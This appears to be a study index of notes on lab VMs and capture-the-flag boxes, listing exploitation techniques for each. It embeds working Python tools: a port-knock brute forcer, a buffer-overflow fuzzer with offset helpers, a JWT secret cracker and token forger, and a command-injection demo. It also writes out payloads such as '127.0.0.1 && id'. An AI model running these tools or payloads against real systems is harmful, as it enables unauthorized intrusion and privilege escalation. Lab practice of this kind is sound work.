
index

1. VM Cyberry: port knocking, comments in HTML, Brainfuck code, Hydra for SSH, executing commands remotely over SSH, installing ftp, openssl decrypt loop passing through all supported ciphers, file command, command injection vulnerability and appending nc to a web request, head command, sudo access, switching to another user with sudo, escaping a restricted shell using awk, running a shell with php -r, creating a PHP page/script with echo, creating a custom password dictionary based on hints, Burp Suite to get root access to the admin panel, details on how to identify a command injection vulnerability, installing a backdoor, user enumeration, unalias, base64 decode, QR code, buffer overflow (not completed), port knocking: generating every ordering of the candidate ports
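The port-knocking notes in item 1 (and the /etc/knockd.conf mention further down this index) come down to two tasks: read the knock sequence out of a knockd.conf if you can get at it, or, when the sequence is unknown, try every ordering of a handful of candidate ports until the protected service answers. The script below is an added example written for this index, not code from any of the linked walkthroughs; the knockd.conf text is constructed for illustration and the host/port arguments are placeholders.

```python
import itertools
import re
import socket
import time

# Constructed sample knockd.conf (illustration only, not taken from any VM).
SAMPLE_KNOCKD_CONF = """\
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 7000,8000:udp,9000
    seq_timeout = 5
    command     = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 5
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
"""


def parse_knockd_sequences(conf_text):
    """Return {section: [(port, proto), ...]} for every knockd section that has a sequence."""
    sequences, section = {}, None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            section = m.group(1)
            continue
        key, _, value = line.partition("=")
        if section and key.strip() == "sequence":
            seq = []
            for item in value.split(","):
                port, _, proto = item.strip().partition(":")
                seq.append((int(port), (proto or "tcp").lower()))   # knockd default is tcp
            sequences[section] = seq
    return sequences


def all_knock_sequences(ports, proto="tcp"):
    """Every ordering of the candidate ports (n! sequences), each as [(port, proto), ...]."""
    return [[(p, proto) for p in perm] for perm in itertools.permutations(ports)]


def knock(host, sequence, delay=0.2, timeout=0.3):
    """Send one knock per port. A SYN (or a UDP datagram) is enough; the reply does not matter."""
    for port, proto in sequence:
        if proto == "udp":
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            s.sendto(b"x", (host, port))
        else:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(timeout)
            s.connect_ex((host, port))   # RST or timeout is expected on a closed port
        s.close()
        time.sleep(delay)


def port_open(host, port, timeout=1.0):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex((host, port)) == 0


def brute_force_knock(host, candidate_ports, target_port=22):
    """Try every ordering of candidate_ports until target_port starts answering."""
    for seq in all_knock_sequences(candidate_ports):
        knock(host, seq)
        if port_open(host, target_port):
            return seq
    return None


if __name__ == "__main__":
    print(parse_knockd_sequences(SAMPLE_KNOCKD_CONF))
    # brute_force_knock("192.168.56.101", [1000, 2000, 3000])  # placeholder target
```

With three candidate ports the brute force is only six sequences; with five it is 120, so it pays to look for the port list (a knockd.conf read via LFI, a hint in a comment) before trying every permutation.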

2. VM The Necromancer: passive scan using tcpdump, victim connecting outbound, echo base64, connecting to port u666 (UDP 666) using nc, custom dictionary, gcc-multilib, executing an ELF file, file, binwalk & exiftool commands, buffer overflow, hidden files or messages inside binaries, pcap files, wireless pcap, aircrack, snmpset, snmpwalk, hydra for ssh, cewl, readelf, adding a breakpoint in gdb, metasploit for SNMP, wfuzz

3. VM Brainpan: the brainpan .exe file, nc <target> 9999, no gcc, strings, wine, SUID/SGID binaries and file permission misconfigurations, special permissions usable with sudo, for-loop script showing the number of packets being sent, using the mona script and ASLR, second buffer overflow to get root using gdb, find, msfvenom reverse shell, full address space layout randomization

4. VM Mr. Robot: WordPress, wpscan brute force, sort/uniq the password file, PHP reverse shell block, crack the MD5 password, search for files with the SUID bit set, use echo to decode the password, extract usernames from the VM's wiki site using cewl, use hydra to crack the password, use metasploit for a reverse shell

5. VM Vulnix: SMTP and finger enumeration, creating a Linux user with a specific UID, root squashing, ssh password cracking using medusa & hydra, logging in using ssh keys, updating the exports via /usr/sbin/exportfs, local bash shell via NFS, PuTTY (using the rlogin service)

6. VM pWnOS 2.0: reading the page source, Simple PHP Blog Perl exploit, Python reverse shell one-liner, looking around, metasploit Simple PHP Blog exploit, Burp Suite, SQL proxy, SQL injection, UNION set of commands, sqlmap to read files and upload a reverse shell

7. VM SkyTower: proxy on 3128, ssh filtered, check vhost, PHP reverse shell via CLI, directory traversal, .bashrc file, proxychains, SQL login filters 'OR' (use ||), Burp to enumerate usernames, SQL injection attack

8. VM VulnOSv2: hidden details in the page, Drupal but couldn't exploit it, sqlmap, kernel exploit, crafting a URL for SELECT with UNION statements

9. VM PHP Include And Post Exploitation walkthrough: LFI, RFI, copying a public key to the victim, TCP redirection forwarding 443 to 22, uploading a PHP file as a PDF to get the ability to run commands, PHP reverse shell

10. VM XSS & MySQL: union-based injection, SQL injection steps, XSS, grabbing the cookie by hosting the stealer code on Kali and having the XSS victim visit it

11. VM Droopy v0.2: Drupal, Metasploit, creating a custom rockyou wordlist filtered by password length, kernel exploit, checking email to get a hint, brute-forcing the TrueCrypt file, installing VeraCrypt, PHP filter using msfvenom

12. VM BTRSys v2.1: WordPress, PHP reverse shell through a theme file, no gcc or python on the victim

13. VM Basic Pentesting 1 (csec): hidden WordPress with default user/password, WordPress metasploit exploit, privesc checker script reports /etc/passwd is writeable, wpscan, phpbash webshell

14. VM SickOs 1.2: curl with the PUT method (advertised in the OPTIONS response) to upload a reverse shell, chkrootkit metasploit module and searchsploit, daily cron job list and running the cron job manually

15. VM Kioptrix 2014: comment in index.html, LFI, access only allowed with a specific User-Agent, metasploit, pChart 2.1.3, phptax, metasploit; getting a core dump while running the privilege escalation exploit, PHP reverse shell, exploit-db 26368 and 28718

16. VM PwnLab: base64 encoding, LFI, PHP reverse shell, Tamper Data, abusing users with '.' in their PATH

17. VM BSides Vancouver 2018 Workshop: anonymous ftp, WordPress, hydra brute force for ftp, wpscan, msfconsole wp_admin_shell_upload, msfvenom python payload, wp-config.php, crontab, hydra brute force for http

18. VM Lord of the Root 1.0.1: sqlmap, medusa, Tamper Data intercept, privilege escalation, Burp Suite, Metasploit, MySQL local privilege escalation via UDF, getting a user sudo access from MySQL, 1518.c mysql exploit; MySQL UDF local privilege escalation, but the /tmp/setuid file is not present

19. VM Trollcave 1.2: stealing the cookie but not working as expected; getting info at the nc prompt but unable to reuse it to get admin web access; Ruby on Rails site/vulnerabilities, directory traversal, login with a public key, exploiting the vulnerability to add a public key to authorized_keys on the victim, exploiting a calculator application running as root by passing another set of commands as parameters to calc to chown and get a reverse shell, netcat without netcat, bash script to enumerate all users, linux/x64/meterpreter_reverse_tcp metasploit session using an ELF payload generated with msfvenom, text walkthrough B, wfuzz, enumerating users and hashes via JSON but no productive outcome, not sure how the final exploit URL was created; exploit-db shows the kernel has a known vulnerability (44298), compiled it on a third machine, execute arbitrary commands as the king user, privilege escalation with SUID binaries

20. VM VulnOS 2: OpenDocMan, Drupal metasploit exploit didn't work (same as above), details in text/picture format, using a python script instead of sqlmap to extract the username and hash from the DB, droopescan

21. VM Pinky's Palace v2: unable to get networking working, getting a 127.0.0.1 IP address; this VM may only work in VM Player

22. VM SmashTheTux 1.0.1: can't find a walkthrough

23. SickOS

24. VM Vulnserver: buffer overflow, python fuzzer script, bad chars

25. VM IMF: decode base64, combining base64 strings, strcmp PHP documentation, SQL injection errors, sqlmap with --cookie, service listening on localhost only, ps aux, /etc/init.d, /etc/knockd.conf, port knocking, "%s" injection, running ltrace on agent, pattern_create.rb & pattern_offset.rb from Metasploit, getting the offset, gdb buffer overflow, PEDA, exploiting the crashing agent, msfvenom, bypassing the CrappyWAF file-type restriction, QR code, xxd, hiding a PHP webshell inside a GIF to run commands, PHP reverse shell, netstat -antp, file command, handling a 32-bit file on 64-bit Kali during the BOF, msfvenom -p, arbitrary python code to build the BOF payload, logging in with the curl CLI, SQL injection test, used curl instead of the browser, objdump
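Items 24 and 25 both walk the same buffer-overflow workflow: fuzz the service with growing input until it dies, feed a cyclic pattern to find the EIP offset (pattern_create.rb / pattern_offset.rb), then send every byte value to find the ones that get mangled. The script below is an added example written for this index, not code from Vulnserver, IMF or any linked walkthrough; it re-implements the Metasploit pattern logic in Python so the offset can be checked offline. The TRUN prefix, host and port are assumptions for a Vulnserver-style target.

```python
import socket
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...: every 4-byte window is unique
    for the first 20280 bytes, so a 4-byte EIP value maps to exactly one offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, value, little_endian: bool = True) -> int:
    """value is the crashed EIP as an int (e.g. 0x41346141 from the debugger) or 4 raw
    bytes. x86 is little-endian, so the register value is packed '<I' before searching."""
    if isinstance(value, int):
        needle = struct.pack("<I" if little_endian else ">I", value)
    else:
        needle = bytes(value)
    return pattern.find(needle)          # -1 if the EIP value is not from our pattern


def badchar_string(exclude=(0x00,)) -> bytes:
    """Every byte value 0x01..0xff minus the ones already known to be mangled.
    Send this after the saved return address and compare the stack dump against it."""
    skip = set(exclude)
    return bytes(b for b in range(1, 256) if b not in skip)


def find_mangled(sent: bytes, received: bytes):
    """Compare what was sent with the bytes read back from memory (gdb/mona dump).
    Returns the first byte that was altered or truncated, or None if all survived."""
    for a, b in zip(sent, received):
        if a != b:
            return a
    if len(received) < len(sent):        # dump stops early: the next byte cut it off
        return sent[len(received)]
    return None


def fuzz_payloads(prefix: bytes = b"TRUN /.:/", start: int = 100, step: int = 100,
                  limit: int = 5000):
    """Generator of payloads of increasing length for a simple crash-finding fuzzer."""
    n = start
    while n <= limit:
        yield prefix + b"A" * n + b"\r\n"
        n += step


def fuzz(host: str, port: int, prefix: bytes = b"TRUN /.:/", timeout: float = 3.0):
    """Send growing payloads until the service stops answering.
    Returns the number of filler bytes that caused the crash, or None."""
    for payload in fuzz_payloads(prefix):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                 # banner
                s.sendall(payload)
                s.recv(1024)                 # a dead service raises here
        except (TimeoutError, ConnectionError, OSError):
            return len(payload) - len(prefix) - 2
    return None


if __name__ == "__main__":
    # Typical use: crash_len = fuzz("192.168.56.101", 9999)   # placeholder target
    crash_len = 2200                               # assumed crash length for the demo
    pat = pattern_create(crash_len)
    eip_seen_in_debugger = 0x41346141              # "Aa4A" once unpacked little-endian
    print("offset:", pattern_offset(pat, eip_seen_in_debugger))
    print("badchars to send:", badchar_string(exclude=(0x00,)).hex())
```

The offset is the number of filler bytes before the saved return address; the next step is to replace those four bytes with the address of a JMP ESP (mona's !mona jmp -r esp, or objdump on the module) and put the msfvenom payload, generated with -b for the bad characters found here, after it.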

26. VM Toppo: log in with the user/password provided on the VulnHub page to perform privilege escalation, unable to get a shell, rpcinfo, showmount, rpcbind, nfs

27. VM SecOS 1: capture the admin cookie using 127.0.0.1 in a test.html page via a cross-site scripting vulnerability, CSRF attack, use exploit 37088 for privilege escalation, hacking Node.js and MongoDB, use wget to POST data from the CLI, append other commands to the ping command using curl and wget, SSH tunnel so we can access the ping site from Kali and don't have to go through the CLI

28. VM SecOS-1: duplicate of 27

29. VM SecTalks BNE0x03 Simple: PHP reverse shell, exploits 36746.c, 37088.c, 37292.c

30. VM Quaoar: WordPress, PHP reverse shell, multiple open ports (22, 53, 80, 110, 139, 143, 445, 993, 995), password in wp-config

31. VM TopHatSec Freshly: we don't know the exact username and password, so we used sqlmap for login-form-based injection to retrieve the database name and login credentials; metasploit msfvenom to create a reverse shell, no gcc on the target, Burp Suite to gather the parameters for sqlmap, unshadow the passwd and shadow files, john, root password in the /var/www/html/login.php file; use Burp Suite to intercept the POST request, put its content in a file called request.txt and run sqlmap against it

32. VM hackfest2016 Sedna: PUT method gives access forbidden, Poster plugin to rename a file, exploit.html to POST a file for the BuilderEngine 3.5.0 arbitrary file upload vulnerability, netcat without netcat using /dev/tcp, exploit 33899, command-line reverse shell, firefart or exploit 40839 but I am getting an error on compilation, metasploit, dirtycow

33. VM Zorz (SUID): none of the walkthroughs show getting root access, so maybe it is not part of the to-do. The walkthroughs show 3 different ways to get shell access. I got a shell by uploading the reverse shell file via the index page and browsing to the /upload1 folder. It shows upload3 but not upload1. upload3 doesn't allow anything except pictures, but a GIF reverse shell or xxd didn't work either. Tried to run the exploit and run the privchecker and exploit checker but they didn't work. No gcc on server. No

34. VM The Wall 1: no open ports in the initial port scan, tcpdump to listen to traffic on the network, nc -nvlp 1337 to get the server to connect back, after which additional ports are enabled; a long 74-character string that needed to be decoded using echo and xxd and then the MD5 cracked, steganography using steghide, sftp, ssh not allowed, file command, scalpel command (uncomment the jpg extension in the scalpel config file and run it in an empty folder), fatcat, a forensics tool used for recovering/extracting data from FAT16 images

35. VM Droopy v0.2

36. VM CTF_2017_online: obfuscated JavaScript (obfuscation is commonly used to hinder reverse engineering of JavaScript, but it only slows a reader down, it does not protect the code); the "var _0xbb15=" gives a hint that it is obfuscated; deobfuscating using JS Beautifier, vulnerability on the https site, decode or reverse engineer the math manually, curl to fetch an HTML page with a --data (POST) request, LFI (local file inclusion), curl to read /etc/passwd via the LFI, wfuzz to fuzz the directory structure to download; one can use wget with --no-directories to download the files from the door and vault folders so it doesn't create thousands of directories, but wget didn't stop automatically, it kept going, maybe it does multiple iterations, not sure; aircrack-ng; looks like a blind SQL injection, as we get no response from an SQL injection error or SELECT statement, so we know the injection worked when we see output, and when no content is shown it is false / didn't work / doesn't exist; possible firewall blocking UNION-based statements, LIMIT SQL function, SQL UNION queries, binwalk, exiftool

37. VM LazySysAdmin

38. VM d0not5top 1.2: Burp proxy, adding hostnames to /etc/hosts, dirb against localhost/domain but not working for me, use the nc command to get the flag and echo to decode the flag, wfuzz, virtual hosts, partial binary string, Google Translate, curl with a custom Host header, additional domains, OWASP ZAP, exiftool, HD, hash64, FUZZ

39. VM HackDay Albania: directory hopping using wfuzz, SQL injection, sqlmap, file-type restriction: upload the PHP reverse shell as a jpg, msfvenom, meterpreter, no python 2.7 or gcc, password in config.php, mysql> prompt, OUTFILE from mysql, writeable passwd file, adding a root user/password to the passwd file, dirsearch, sqlmap time-based blind attack, why the username field is susceptible to injection while the password field isn't, port forwarding in our meterpreter session

40. VM Dina 1.0.1: zip2john, Burp proxy to change the User-Agent (User-Agent vulnerability), PHP reverse shell

41. VM Billy Madison 1.0: WordPress running on tcp 69, wpscan, Caesar cipher tool with a rotation of 13, dirsearch, smbclient, sending email using swaks, aircrack, SUID, running a binary as root and adding the user to sudoers, smtpd on port 2525, email to the backdoor, mapping a shared folder with smbclient, Wireshark pcap follow TCP stream, dirbuster, hydra brute force for ftp, port knocking, dirb

42. VM covfefe 1: cracking the passphrase of an SSH private key, mini buffer overflow: buf[20], put /bin/bash after 20 characters

43. VM Milnet 1: error

44. VM Defence Space CTF 2017: phpMyAdmin, ftp, http/https, default password, flag in the certificate, ssh on port 2225, crunch command, reverse shell using python and SQL

45. VM CTF Jarbas 1: website linked to an external website, Jenkins, dirb with the -X option to search for html and php files, unhash the password, run a shell via the Jenkins web app, msfvenom payload with base64 encode/decode, privilege escalation by adding the user to the sudoers file

46. VM JIS-CTF VulnUpload: dirb, info in the HTML source, password in mysql.conf.d

47. VM Bob 1.0.1: webshell, robots.txt, reverse shell, chaining two OS commands using && and ||, hidden content/information, spawning a python shell, ssh on a non-default port, searching for txt files, password in a text file, GPG file where the key is the first letter of each line of a file, Burp Suite, PGPCrack-NG (a program designed to brute-force symmetrically encrypted PGP files) not useful here

48. VM HTB Nineveh: unable to test it since the VM had a static IP; hydra brute force for www, searchsploit phpLiteAdmin 1.9, hydra brute force for https where the username is irrelevant but required to complete the command, PHP reverse shell, create a database and table in phpLiteAdmin, directory traversal, chkrootkit privilege escalation bug, port knocking, strings to extract the key from a png file

49. VM Rotating Fortress 1.0.1: hard; unable to find much info via enumeration, so I just read the walkthrough; change the cookie to get admin web access, strings on loki.bin, which is an executable, use a debugger to look at the code to get the password, the page shows numbers that look like the hex encoding of a message that needs to be decrypted, sed, tr, decrypt/decipher script; not sure how the author got from the message to decrypt.sh to create the key, not very clear; the first & second keys are positive while the 3rd is negative, why?; script to generate the wordlist, wfuzz, port knocking, reverse shell, sudo -l for privilege escalation. x64dbg is a 64-bit app which couldn't open loki.bin on a Windows machine. Tried to open it in Immunity Debugger on Windows, which is a 32-bit app, and OllyDbg under wine on Kali, which is a 32-bit app as well. Was able to open loki.bin in gcc and see the password, but the screen output is different from what is listed in walkthrough A

50. VM MinU 1: wfuzz, WAF (wafw00f identifies ModSecurity / OWASP CRS), way too many 403s, looks like LFI but it isn't, it is remote command execution; reading /etc/passwd and running ls -la through the remote command execution using wildcards, tac (concatenate and print files in reverse), head (output the first part of files), rev (reverse lines characterwise), msfvenom, privilege escalation using the JSON web token: use an online debugger to decode the header and payload, JWT cracker
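The JWT privilege escalation in item 50 works because an HS256 token is only as strong as its shared secret: the signature is HMAC-SHA256 over header.payload, so once the secret is recovered from a wordlist any claim can be rewritten and re-signed, and the server cannot tell the forged token from a real one. The script below is an added example written for this index, not the MinU box's code or any JWT library; the token, secret and wordlist are constructed inline. It also shows the check a correct verifier needs so that an alg=none token is rejected.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))   # restore stripped padding


def decode_jwt(token: str):
    """Header and payload are only base64url-encoded JSON; no secret needed to read them."""
    hdr, pl, _sig = token.split(".")
    return json.loads(b64url_decode(hdr)), json.loads(b64url_decode(pl))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    hdr = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    pl = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{hdr}.{pl}".encode(), hashlib.sha256).digest()
    return f"{hdr}.{pl}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Verifier that pins the algorithm: alg=none and anything but HS256 is rejected."""
    try:
        hdr, pl, sig = token.split(".")
        header = json.loads(b64url_decode(hdr))
    except (ValueError, json.JSONDecodeError):
        return False
    if header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret, f"{hdr}.{pl}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def crack_secret(token: str, wordlist):
    """Offline dictionary attack: the token itself is the oracle, no requests needed."""
    for word in wordlist:
        if verify_hs256(token, word.encode()):
            return word
    return None


def forge(token: str, secret: bytes, **claims) -> str:
    """Re-sign the same token with modified claims, e.g. role='admin'."""
    header, payload = decode_jwt(token)
    payload.update(claims)
    return sign_hs256(header, payload, secret)


def alg_none_token(payload: dict) -> str:
    """Token with alg=none and an empty signature; a correct verifier must refuse it."""
    hdr = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}, separators=(",", ":")).encode())
    pl = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return f"{hdr}.{pl}."


# Constructed sample: a low-privilege token signed with a weak secret (assumed values).
SAMPLE_SECRET = b"password1"
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"},
                          {"user": "guest", "role": "user"}, SAMPLE_SECRET)
WORDLIST = ["admin", "secret", "letmein", "password1", "changeme"]   # constructed

if __name__ == "__main__":
    print("decoded:", decode_jwt(SAMPLE_TOKEN))
    secret = crack_secret(SAMPLE_TOKEN, WORDLIST)
    print("cracked secret:", secret)
    admin = forge(SAMPLE_TOKEN, secret.encode(), role="admin")
    print("forged token verifies:", verify_hs256(admin, secret.encode()))
```

On a real target the wordlist is rockyou or a cewl list, and the cracked secret is reused to mint the admin token that the application then accepts in its cookie or Authorization header.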


51. VM BlackMarket 1: cewl custom dictionary, sqlmap, online MD5 cracking tool to decode the enumerated hashes, backdoor, password in strings (in decimal format, needs to be converted to hex and then to ASCII), illusion: on this page you will get a hidden login form as declared in the encrypted mail; still, if you have any confusion, read the email from Dimitri one more time and everything will be clear, Burp Suite

52. VM DerpNStink 1: WordPress, wpscan, WordPress vulnerability, access via the mysql user/password, hashcat, password in a pcap file, a sudo entry will get you root but the file/dir in sudoers doesn't exist, so you have to create it; /dev/tcp reverse shell, use the private key to log in via ssh

53. VM Basic Pentesting 2: brute force the passphrase for ssh login, convert the private key with ssh2john into a format john the ripper can crack; vim.basic has root permissions, which means I could probably read the file in kay's directory

54. VM W1R3S 1.0.1: local file inclusion, ftp, Cuppa CMS vulnerability, LFI works using the CLI but not the browser, john, sudo su for privilege escalation; I was getting the same response from the server for the LFI, it looked like it needed URL encoding: "After a bit of research I found I may have better luck with encoded url (url encoding) params, so I utilised cURL"

55. VM Bulldog 1: password hash in the source, webshell with limited commands but use || or && to run any command, crontab, python reverse shell for privilege escalation, password in a binary file, extract it using strings, read files from the webshell, upgrade the shell
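Items 27, 47 and 55 all lean on the same weakness: a web page pastes user input into a shell command (a ping form, a "restricted" webshell) and the restriction is a substring or blocklist check, so && and || still chain a second command. The example below is added here and is not code from any of the VMs; it shows the vulnerable pattern, why the two common filters are bypassed, and the fix (an allowlist on the input plus subprocess without a shell). The allowed-command set and the ping form are assumptions for illustration.

```python
import ipaddress
import re
import shlex
import subprocess

# --- vulnerable pattern: user input concatenated into a shell command line ----------------
def build_shell_command(host: str) -> str:
    """What a naive ping form hands to /bin/sh; '127.0.0.1 && id' becomes two commands."""
    return "ping -c 1 " + host


def vulnerable_ping(host: str) -> str:
    # shell=True: &&, ||, ;, | and $(...) inside `host` are interpreted by the shell
    result = subprocess.run(build_shell_command(host), shell=True,
                            capture_output=True, text=True)
    return result.stdout + result.stderr


# --- the two filters that the walkthroughs get past -----------------------------------------
ALLOWED_COMMANDS = {"ifconfig", "ls", "echo", "pwd"}          # assumed allowlist


def webshell_prefix_check(cmd: str) -> bool:
    """Restricted-webshell check: 'allowed' if the line contains an allowed word.
    'ifconfig && cat /etc/passwd' passes because 'ifconfig' appears in it."""
    return any(word in cmd for word in ALLOWED_COMMANDS)


def naive_blocklist(host: str) -> bool:
    """Ping-form check that only blocks ';' and '|': '127.0.0.1 && id' passes."""
    return ";" not in host and "|" not in host


# --- hardened version: validate against an allowlist, never give the input to a shell -----
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(\.(?!-)[A-Za-z0-9-]{1,63})*$")


def is_valid_target(host: str) -> bool:
    """Accept a literal IP address or a plain hostname; anything else never reaches ping.
    The leading '-' check also blocks argument injection such as '-c 9999'."""
    if len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def safe_ping(host: str) -> str:
    if not is_valid_target(host):
        raise ValueError("invalid target")
    # argv list + shell=False: host is a single argument, no shell ever parses it
    result = subprocess.run(["ping", "-c", "1", host],
                            capture_output=True, text=True, timeout=10)
    return result.stdout


def safe_webshell(cmd: str) -> list:
    """Restricted shell done properly: exact match on argv[0], executed without a shell.
    Returns the argv that would be passed to subprocess.run(argv, shell=False)."""
    argv = shlex.split(cmd)
    if not argv or argv[0] not in ALLOWED_COMMANDS:
        raise ValueError("command not allowed")
    return argv          # '&&' here is a literal argument to ifconfig, not a chain operator


if __name__ == "__main__":
    payload = "127.0.0.1 && id"
    print("shell would run:", build_shell_command(payload))
    print("blocklist lets it through:", naive_blocklist(payload))
    print("allowlist rejects it:", not is_valid_target(payload))
    print("webshell argv:", safe_webshell("ifconfig && cat /etc/passwd"))
```

The test for a suspected injection point is the same in every box above: append `&& sleep 5` or `|| id` to the expected value and watch for a delay or extra output; if a blocklist strips `;` or `|`, try `&&`, a newline, or `$(...)` before concluding the input is safe.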

56. VM Fowsniff 1: IMAP and POP3 ports, access the mailbox from the CLI, add a python reverse shell to the login banner so that when a user logs in the banner runs and gives root access, metasploit POP3 access
